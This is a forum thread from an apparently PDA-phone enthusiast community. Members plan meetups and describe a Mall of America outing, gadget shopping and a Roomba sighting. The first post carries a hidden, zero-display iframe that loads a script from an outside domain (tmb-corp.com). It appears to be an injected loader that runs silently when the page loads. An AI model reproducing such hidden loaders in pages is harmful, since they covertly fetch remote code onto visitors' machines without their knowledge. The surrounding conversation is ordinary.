+ Reply to Thread

Thread: Get Togethers

Get Togethers

A new "service"

When you are planning a get-together, let me (Jazz) know and I'll post an annoucement in all of the forums to direct members towards your thread in the General Discussion Forum.

Obviously, we will only place annoucements for get-togethers that are in the very near future (to prevent clogging up the board with too many announcements) <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    --Jazz--

Re: Get Togethers

Sounds like a great idea.... I am meeting with CoolCat and Markito in two hours (noon) at the Mall of America. Is that *near future* enough? LOL -- Its too late for this one, but when the next "Formal" MN-Kyo-Krazies meeting happens we'll let you know.
    iPhone therefore iAm.

Re: Re: Get Togethers

Originally posted by Steve
    Sounds like a great idea.... I am meeting with CoolCat and Markito in two hours (noon) at the Mall of America. Is that *near future* enough? LOL -- Its too late for this one, but when the next "Formal" MN-Kyo-Krazies meeting happens we'll let you know.
    Have fun guys! :clap
    Please visit my picture site: Robert-O-Rama :)

Thanks Robert K-- It was fun.

I bought my adapter from Coolcat (Saved myself the $5 shipping too) & we sat down and had lunch at the 3rd floor foodcourt. We talked tech and I was now jealous of TWO 7135's. Afterwards Markito and I made our own scavenger hunt looking for the IR Keyboard (Found one at Radioshack for a whopping $99) and the Veo SD Camera (Found at Franklin-Covey store, also $99) We only window shopped but the hunt was fun-- during our travels we stopped to drool over the I-Robot at Brookstone, A Self-actuated Vacuum cleaner!

Soon after I get my 7135, I'm sure we will annouce the next official MN Kyo-Krazies Get-together.
    iPhone therefore iAm.

~'kito
    pdaPhoneHome Moderator

RoombaVac

Wow! This looks cool! And not too pricey either!

~'kito
    pdaPhoneHome Moderator

If I am ever in MN

Hey guys, sounds like your meeting was fun! My company has an office in MN and I travel up there occasionally. We should all meet up next time I am up that way. I will post next time I go!

Sounds good ClintRob.
    ~'kito
    pdaPhoneHome Moderator